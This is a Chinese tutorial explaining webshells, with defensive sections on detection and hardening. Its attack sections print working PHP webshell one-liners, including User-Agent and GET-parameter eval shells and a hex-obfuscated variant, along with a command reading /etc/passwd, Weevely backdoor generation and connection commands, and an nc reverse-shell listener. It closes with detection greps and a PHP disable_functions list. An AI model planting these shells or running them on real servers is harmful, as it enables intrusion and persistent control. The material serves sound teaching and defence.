一文详解Webshell

字数 1428 2025-08-15 21:30:51

Webshell 全面解析与防御指南

一、Webshell概述

定义：Webshell是一种恶意脚本，黑客通过它获取服务器执行操作权限，可执行系统命令、窃取数据、修改网页内容等。

危害性：

持久化远程访问服务器
权限提升至Root级别
极强的隐蔽性（通过80端口通信，绕过防火墙）

常见利用漏洞：

SQL注入
远程文件包含(RFI)
FTP漏洞
跨站脚本攻击(XSS)

主要语言类型：

ASP
JSP
PHP（最广泛使用）

二、Webshell攻击特点

1. 持久化访问

包含后门功能实现长期控制
黑客常自行修复利用过的漏洞以避免被发现

2. 权限提升

初始以web服务器用户权限运行
利用本地漏洞提升至Root权限
可执行任意系统操作（安装软件、修改权限、增删用户等）

3. 隐蔽性

嵌套在正常网页中运行
通过80端口通信，不被防火墙拦截
POST请求方式减少日志记录
只在Web日志中留下少量数据提交记录

三、PHP Webshell常用函数

1. system()

<?php system("dir"); ?>

执行命令并输出结果
Windows执行dir，Linux执行ls

2. exec()

<?php exec("echo Hello World", $output); ?>

执行命令但不直接输出
可选第二参数存储结果为数组

3. shell_exec()

<?php echo shell_exec("ls -la"); ?>

类似exec()，但返回完整字符串输出

4. passthru()

<?php passthru("cat /etc/passwd"); ?>

执行命令并返回原始格式输出

5. proc_open()

创建处理程序实现脚本与运行程序间通信

6. 倒引号(``)

<?php echo `whoami`; ?>

PHP会优先执行倒引号内的shell命令

7. 危险函数检测

<?php print_r(get_defined_functions()); ?>

列出所有已启用的PHP函数

四、Webshell隐藏技术

1. 修改报头

通过User-Agent传递命令而非POST参数

<?php system($_SERVER['HTTP_USER_AGENT']); ?>

服务器日志中User-Agent显示为执行的命令

2. 文件隐藏

上传到深层子目录
使用随机文件名
嵌入合法文件中

<?php @eval($_GET['cmd']); ?>

使用@运算符防止错误日志记录

3. 混淆技术

(1) 删除空格换行

<?php function a(){echo'1';}a();?>

(2) 加密技术

使用加密函数重建代码

(3) Hex编码

<?php 
$hex = "73797374656d28245f4745545b2763275d293b"; 
eval(pack("H*", $hex)); 
?>

解码后等同于system($_GET['c']);

(4) 可控输入

<?php $_GET['a']($_GET['b']); ?>

通过GET参数传递函数名和参数

五、Webshell实战使用（以Weevely为例）

1. 创建后门

weevely generate password agent.php

生成加密的agent.php文件

2. 连接后门

weevely http://target.com/ma.php password

3. 反弹TCP Shell

攻击机监听：

nc -lvp 8181

通过Webshell发起反弹连接

4. 隐蔽特性

请求显示为来自Google的合法流量
TCP通信不留HTTP层日志痕迹

六、Webshell检测方法

1. 日志分析

grep -r "system(" /var/log/apache2/
grep -r "eval(" /var/log/nginx/

2. 文件系统检查

# 搜索可疑字符串
grep -r "base64_decode" /var/www/
find /var/www/ -name "*.php" -exec grep -l "passthru" {} \;

# 查找近期修改文件
find /var/www/ -name "*.php" -mtime -1

3. 网络监控

异常出站连接
非常规端口通信

4. .htaccess检查

查找异常重定向或权限设置

七、Webshell防御措施

1. PHP安全配置

; 禁用危险函数
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,pcntl_exec,eval,assert

2. 输入验证

escapeshellarg($input);
escapeshellcmd($command);

3. 上传安全

严格限制上传文件类型
上传目录禁用PHP执行

<Directory "/var/www/uploads">
    php_flag engine off
</Directory>

4. 系统加固

最小化Web服务器用户权限
定期更新CMS和插件
避免使用不可信第三方代码

5. 专业工具

部署专业的Webshell检测系统
实施行为分析而非仅依赖特征检测

八、总结

Webshell因其编码简单、使用方便而成为黑客常用工具。由于Web服务器普遍配置问题，即使简单脚本也能造成严重破坏。防御关键在于：

预防漏洞被利用（及时修补）
限制危险函数使用
实施严格的输入验证
建立全面的监控体系
采用多层防御策略

记住：Webshell只是攻击工具，真正的防御应从消除可利用漏洞开始。

Webshell 全面解析与防御指南一、Webshell概述定义：Webshell是一种恶意脚本，黑客通过它获取服务器执行操作权限，可执行系统命令、窃取数据、修改网页内容等。危害性：持久化远程访问服务器权限提升至Root级别极强的隐蔽性（通过80端口通信，绕过防火墙）常见利用漏洞： SQL注入远程文件包含(RFI) FTP漏洞跨站脚本攻击(XSS) 主要语言类型： ASP JSP PHP（最广泛使用）二、Webshell攻击特点 1. 持久化访问包含后门功能实现长期控制黑客常自行修复利用过的漏洞以避免被发现 2. 权限提升初始以web服务器用户权限运行利用本地漏洞提升至Root权限可执行任意系统操作（安装软件、修改权限、增删用户等） 3. 隐蔽性嵌套在正常网页中运行通过80端口通信，不被防火墙拦截 POST请求方式减少日志记录只在Web日志中留下少量数据提交记录三、PHP Webshell常用函数 1. system() 执行命令并输出结果 Windows执行dir，Linux执行ls 2. exec() 执行命令但不直接输出可选第二参数存储结果为数组 3. shell_ exec() 类似exec()，但返回完整字符串输出 4. passthru() 执行命令并返回原始格式输出 5. proc_ open() 创建处理程序实现脚本与运行程序间通信 6. 倒引号( `` ) PHP会优先执行倒引号内的shell命令 7. 危险函数检测列出所有已启用的PHP函数四、Webshell隐藏技术 1. 修改报头通过User-Agent传递命令而非POST参数服务器日志中User-Agent显示为执行的命令 2. 文件隐藏上传到深层子目录使用随机文件名嵌入合法文件中使用@运算符防止错误日志记录 3. 混淆技术 (1) 删除空格换行 (2) 加密技术使用加密函数重建代码 (3) Hex编码解码后等同于 system($_GET['c']); (4) 可控输入通过GET参数传递函数名和参数五、Webshell实战使用（以Weevely为例） 1. 创建后门生成加密的agent.php文件 2. 连接后门 3. 反弹TCP Shell 攻击机监听：通过Webshell发起反弹连接 4. 隐蔽特性请求显示为来自Google的合法流量 TCP通信不留HTTP层日志痕迹六、Webshell检测方法 1. 日志分析 2. 文件系统检查 3. 网络监控异常出站连接非常规端口通信 4. .htaccess检查查找异常重定向或权限设置七、Webshell防御措施 1. PHP安全配置 2. 输入验证 3. 上传安全严格限制上传文件类型上传目录禁用PHP执行 4. 系统加固最小化Web服务器用户权限定期更新CMS和插件避免使用不可信第三方代码 5. 专业工具部署专业的Webshell检测系统实施行为分析而非仅依赖特征检测八、总结 Webshell因其编码简单、使用方便而成为黑客常用工具。由于Web服务器普遍配置问题，即使简单脚本也能造成严重破坏。防御关键在于：预防漏洞被利用（及时修补）限制危险函数使用实施严格的输入验证建立全面的监控体系采用多层防御策略记住：Webshell只是攻击工具，真正的防御应从消除可利用漏洞开始。